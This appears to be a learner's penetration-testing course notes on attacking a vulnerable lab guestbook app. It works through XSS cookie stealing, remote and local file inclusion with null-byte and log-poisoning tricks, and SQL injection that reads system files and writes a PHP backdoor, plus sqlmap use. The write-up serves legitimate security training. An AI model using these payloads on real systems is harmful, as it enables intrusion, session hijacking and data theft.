==============================================================
WEB APPLICATION ATTACKS - Overview
==============================================================
Most breaches originate from web application attacks. This makes sense as a Dynamic Web Application provides a larger attack service and the web application often runs server side code, depending on the quality of the code and the configuration of the web server, the integrity of the site could be compromised by a malicious user.

Web application can be written in a variety of languages, each with its own specific vulnerability classes although the main attack vectors are similar in concept. This module introduces several web applicaiton attack vectors in windows and linux environments. Keep in mind that the topic of web application attacks is vast and complex. This module will discuss the basic attack vectors using simple examples.

Plugins that are useful to have in your browser during a web assessment:
- cookies manager plus
- tamper data

In the windows lab machine, run XAMPP with admin priv and start Apache and MySQL. Then load up the guestbook application that is hosted on the windows lab machine, by browsing to the IP of the windows lab machine.

Click "Sign the guestbook". This page does not sanitize the input.

Enter a name in the name field and some javascript in the comment field. eg

The following script creates an http connection to the attacking Kali machine on port 81 using an invisible iframe.

Before a victim loads this page, setup a listener on port 81.
#nc -lvp 81

This browser redirection technique can now be used to:
- redirect a victim to client side exploits
- gather information about their browser
- or steal any cookies or authentication tokens that the victim may have.

Lets look at stealing authentication cookies.

The admin victim logs in to the admin area on the page using username "offsec" and password "123456". This adds a phpsession cookie to the user's browser.

As the attacker, we now inject our Cookie Stealing JavaScript input in to the input box.

The code calls a non existent page on the attacking machine on port 81 and then proceeds to append the victims document.cookie value as a parameter to this page.

Setup a listener on port 80 on the attacker and have the victim load the page. This results in the PHPSession appearing in the attackers screen as part of the requested page. The cookie can then be used in an application such as Cookie Manager Plus to introduce this authenticated cookie in to my browser.

Copy the cookie.
As the attacker, load the admin page.
Open the Cookies Manager Plus menu.
Replace the content of the currently set PHPSession cookie.
Refresh the admin page.

The guestbook application on the windows 7 lab machine includes a signing page. When signing the guestbook, you may choose the language that you would like to see used in the thank you message once the message is posted. This control is drop down that has 2 options. EN and FR.

The vulnerability occurs in a HTTP GET request. Only EN.php and FR.php are expected however the input is not sanitized so the vulnerable lang parameter can be easily swapped out in the URL.

Remote File Inclusion:

The 'lang' parameter such as fr or en in the URL can be swapped out with a reference to a remote file. eg. http://10.11.0.179/evilPHP.txt. This file contains the php script to run the ipconfig command. The file can be created and placed in the webroot directory from the command line with the command below.

#echo '' > /var/www/html/evil.txt

We tail the logs from Kali for apache.
#tail -f /var/log/apache2/access.log

Now when we replace the 'lang' parameter of 'en' or 'fr with 'http://10.11.0.179/evil.txt' we get an error. The error shows that an additional .php is being appended to the file. The request is now for evil.txt.php.

The .php is being appended to the parameter before the request is made. One way to get rid of the .php is to try and terminate the parameter using a nullbyte character. In PHP versions below 5.3 a nullbyte or %00 in the url would cause the php engine to ignore everything after that byte.

So instead of replacing the 'lang' parameter of 'en' or 'fr with 'http://10.11.0.179/evil.txt' we use 'http://10.11.0.179/evil.txt%00' instead. This works in this case. The logs also show that the request being performed is now for evil.txt instead of what we had earlier of evil.txt.php that caused an error.

While PHP RFI vulnerabilities are relatively easy to exploit, most default php configurations prevent these types of attacks by disallowing remote file includes of http URIs through the php.ini config file.
See url_fopen and allow_url_include. Both should be turned off and normally would be. If they are turned off, then we need to use LFI.

Local File Inclusion:

In order to use Local File Inclusion, we need to be able to write php code to the server and then include the file that we have written to in a request so that it executes. One option is to contaminate log files of various services on the victims server, in a way that results in php code being executed.

For example, consider the netcat command below, which connects to the victim web server on port 80.

#nc -nv 10.11.25.139 80

and when connected a simple php backdoor is posted.

Looking at the logs of the webserver will reveal whether we have managed to taint these logs. The logs on the windows lab machine are found here:

c:\xampp\apache\logs\access

Now that the code has been introduced in to the local file system, I can try and execute it, by having php include the log file thus executing the php code within.

The backdoor introduced a cmd GET parameter which we will set in from of 'LANG' eg cmd=ipconfig&LANG= we will then reference the log file followed by a nullbyte. ../../../../../../../xampp/apache/logs/access.log%00

'LANG=fr' is now 'cmd=ipconfig&LANG=../../../../../../../xampp/apache/logs/access.log%00'

The details on how this LFI vulnerability was leveraged to get a working cmd.exe reverse shell are i

===================== RFI =======================

While I tried for hours to get a reverse shell using ftp, I ended up using tftp as per the article below:
https://penetrate.io/2014/01/10/from-rfi-to-shell/

**************************************************************
https://technet.microsoft.com/en-au/library/bb490910.aspx
To log on to the FTP server named ftp.example.microsoft.com and run the ftp commands contained in a file named Resynch.txt, type the following command:
ftp -s:resynch.txt ftp.example.microsoft.com
********************************************************************

Normally input from a HTML form. Allows malicious users to manipulate Database queries. This could lead to information leakage and depending on the environment, it could lead to complete server compromise.

The following modules will look at SQL injection in a PHP / MySQL environment. WHile the principles are the same for other environments, the syntax may slightly change.

In order to interact with the mysql database from the command line on the windows 7 lab machine to understand the commands and see the results, navigate through to the C:\xampp\mysql\bin folder from cmd.
c:\>mysql -u root -p

SQL injection attacks are most commonly used to disclose database information using various injected queries. Most of these data extraction techniques rely on abusing SQL query statements and gathering information on the database structure by examining the responses of the database to these queries. Trying to enumerate the number of columns in a currently used table can serve as a quick example of this principle, as knowing this information is critical for a more in depth enumeration of the database.

Let's examine the page comment.php

The original URL here is
http://10.11.25.179/comment.php?=id=738

Adding a single quote to the unsanitized id parameter breaks the query and produces an error:
http://10.11.25.179/comment.php?=id=738'

Depending on the Verbosity of the web application, an attacker could try to us the ORDER BY output query to gather information about the table structure by examining these error messages.

Adding the ORDER BY output query will help us understand the number of columns in the database.
http://10.11.25.179/comment.php?=id=738 order by 1
http://10.11.25.179/comment.php?=id=738 order by 7

By iterating through the number at the end of the ORDER BY query we are able to determine that there are 6 columns in the affect guestbook table.

Now that we know the number of columns in the table, we can attempt to expose data from the databasew using the UNION command.

The UNION ALL operator is used to combine the result set of 2 or more select statements and is a useful statement to inject as it allows us to add out own select statements to the original query. However our appended select statement must have the same number of columns as results of the original select statement in order to succeed. This is why we needed to enumerate the number of columns in the table to begin with.

Our next step is to understand where the affected page shows the output from the database. We can do this by adding tags for each column and seeing where each one ends up on the page.
http://10.11.25.179/comment.php?=id=738 union select 1,2,3,4,5,6

NOTE: 'union all select' is used in the manual. Worth trying if on some apps.

The result of this request shows that the number 5 appears in the comments section. This will be a suitable location for our output.

Let's now see if we can enumerate the SQL version of the server. We will use a MySQL version command - @@version
http://10.11.25.179/comment.php?=id=738 union select 1,2,3,4,@@version,6

The current user being used for the database connection can be discovered using the 'user()' command.
http://10.11.25.179/comment.php?=id=738 union select 1,2,3,4,user(),6

in this case we see root@localhost is user.

With the running version of MySQL and root permissions, we can enumerate database tables and column structures through the MySQL information schema. This will provide us with a very convenient layout of the database, so we can better choose what information we want to target and extract. The injected query for this would like similar to the following:
http://10.11.25.179/comment.php?=id=738 union select 1,2,3,4,table_name,6 FROM information_schema.tables

The result of this query prints all of the table names on all of the databases on this server.

At the end of the list of tables, we see a list of user tables. Lets target the user table and get a list of column names for the users table.

In order to have the windows lab machine in the right state for blind sql injection some of the verbose logging that we have previously used to assist in the exploitation now needs to be turned off.

c:\xammp\htdocs\comments.php

Disable error reporting by adding
error_reporting(0);

in to the start of the php code.

Avoid having the MySQL error displayed on the page. Toward the bottom of the code adjust the line that reads:
$result=mysql_query($q) or die (mysql_error());

So that it is just
$result=mysql_query($q);

Now when we browse to the comments.php in the web app and add a single quote to the command line, we no longer see the error that we saw previously. We now need to proceed with blind SQL injection, usually by using behavioural responses of the web application to our queries. For example if we try to alter the condition of the result by adding a 1=1 and then terminating or input so that the request appears as shown below:
10.11.25.139/comment.php?id=737 and 1=1;#

We still see the same result returned as earlier. Now we will negate the true statement so that it is untrue. The request now appears as shown below:
10.11.25.139/comment.php?id=737 and 1=2;#

Now when the request is executed, no results are returned. What we see here could be indicative of a SQL injection point as our input seemed to affect the output of the query. Alternatively if altering the query does not affect the output we could always try to use time as a test parameter for our queries. For example, we could see if we could introduce the sleep command in to a MySQL query. If the web application hangs for a few seconds, we can once again dedcue that our input is affecting the database queries.

If we add the sleep command for 5 seconds, the request will now appear as:
10.11.25.139/comment.php?id=737-sleep(5)

The result of this request delays the page loading for 5 seconds or more. In my case, the page took around 20 seconds to come back.

Now using multiple queries, we can start enumerating the database for more information.

A simple example of this technique is discovering the MySQLDatabase version. From the command line, interacting directly with the database as the admin of the database, the command "select @@version;" returns the version. In this case it is 2.1.30-community.

We can now create a conditional statement such as the following:
mysql>select IF(MID(@@version,1,1) = 5, SLEEP(5), 0);

The MID command will compare the first character of the output of the version command to the number 5. This query takes 5 seconds to complete.

Now we will try this command in the web interface. The request will appear as
10.11.25.139/comment.php?id=737-IF(MID(@@version,1,1) = 5, SLEEP(5), 0);

As expected, this query hangs the web browser for 5 or more seconds. As a contrast, lets compare the mysql version query to 4 and see if this still takes 5 or more seconds to return.
10.11.25.139/comment.php?id=737-IF(MID(@@version,1,1) = 4, SLEEP(5), 0);

When comparing to '4', the result is returned very fast, the sleep command was not executed. Depending a range of factors, SQL injection vulnerabilities, may be used to read and write files on to the underlying operating system. Writing a carefully crafted file containing our own code, to the root directory of the web server could then be leveraged for full code execution. As our victim web and database servers are running with administrative privileges, we will have few limitations during this attack. On linux platforms, usually the web and database run with less privilege and directory permission are generally tighter.

Back to our examples, I will start to attempt to read our windows host file by using the mysql load_file function. Once again, the output will be displayed in the comments column, - column 5. The request is shown below:
10.11.25.139/comment.php?id=737- union all select 1,2,3,4,load_file("c:/windows/system32/drivers/etc/hosts"),6

The result of the request is the windows hosts file printing out in to the comments field.

Now we will try to use the MySQL into OUTFILE function to create a malicious PHP file in the servers webroot. The request appears as shown below:
10.11.25.139/comment.php?id=737- union all select 1,2,3,4,"",6 into OUTFILE 'c:/xampp/htdocs/backdoor.php'

Before running the command I do not see any backdoor.php in the c:\xampp\htdocs folder on the victim server. After executing the command in the web application, I can confirm that the file has now been created. The behaviour is the web app was that the result of the first of the of the query id=737 was not returned. The file was created on the server though.

Now I should be able to execute this backdoor, and passing the cmd parameter will allow me to execute any command I desire. The request now appears as
10.11.25.139/backdoor.php?cmd=ipconfig

The next part of this module was exploiting this to get a shell. I used tftp to transfer nc. To do this I created a file on the victim with the same tftp commands that I used in the RFI section however instead of creating the file on my machine, I created it on the victim using the INTO OUTFILE MySQL command. The full details of this are in the keepnote details.

Web applications may restrict input given by a user. This could be in the form of a drop down menu where input is limited to specific items or perhaps the input is checked for length or special characters using client side validation.

We will now look at the vulnerable search page in the guestbook application. In this case we see that the page has both a text input field as well as a drop down menu with 2 selections available. The search field is protected against MySQL attacks while the drop down menu (lang parameter) is not sanitized and is vulnerabl to MySQL Injection however the web application does not allow for easy modification of the parameter since it uses a drop down menu rather than a text field. What makes this vulnerability even more annoying to exploit is the fact that the request made by this page is a POST request that does not allow for easy parameter modification through URL modification as we have done so far. To deal with cases like these we can usually bypass any client side restrictions imposed on us by the web application by using a local web proxy. This proxy can intercept inbound and outbound HTML requests and allows us to edit the various parameters set, effectively bypassing all client side restrictions. A firefox plugin called tamper data will suit our needs perfectly.

Once activated, Tamper Data will intercept our post requests and allow us to modify the lang parameter.

Start Tamper Data and perform a search. Click on 'Tamper' and change the value of the lang parameter from en to a single '. When this is posted, note the error message seen in the web application. We have managed to bypass the client side restriction and send invalid input in to the SQL query on this page.

I have exploited this vulnerability to the point of getting a shell on the machine. In order to do this enumeration of database first needed to take place as I needed to use 'union all select' and the number of columns then needs to match the database. Full details of what worked here is in my keepnotes.

The SQL Injection process that we have followed up to now can be automated. Several useful tools exist in Kali linux to help expedite the exploitation of these vulnerabilities. One such notable tool is SQL Map. This tool can be used to be identify and exploit SQL Injection vulnerabilities, let's quickly use this tool to crawl and enumerate our vulnerable web application and have it automatically search for SQL injection vulnerabilities.

As SQL Map crawls and discovers web pages, it also looks for HTTP GET or POST parameters to which various SQL tests are sent. Once an injection point is found we can use SQL Map to automate the extraction of data from the database.

I'll now point SQL Map to the vulnerable web page and parameter in the web application and use the --dump parameter to have the tool extract the information that I am after.

SQLMap includes many advanced features including the ability to attempt web application firewall bypasses and execute complex sequences of queries that automate a complete takeover of the server. For example using the --os-shell parameter will attempt to automatically load a file to the web server and provide us with automatic code execution abilities. If the attack completes successfully, I should be able to type system commands in this prompt.

Experiment with SQL MAP in the labs.

All exercises with SQL Maps and experimentation is noted in my keepnotes.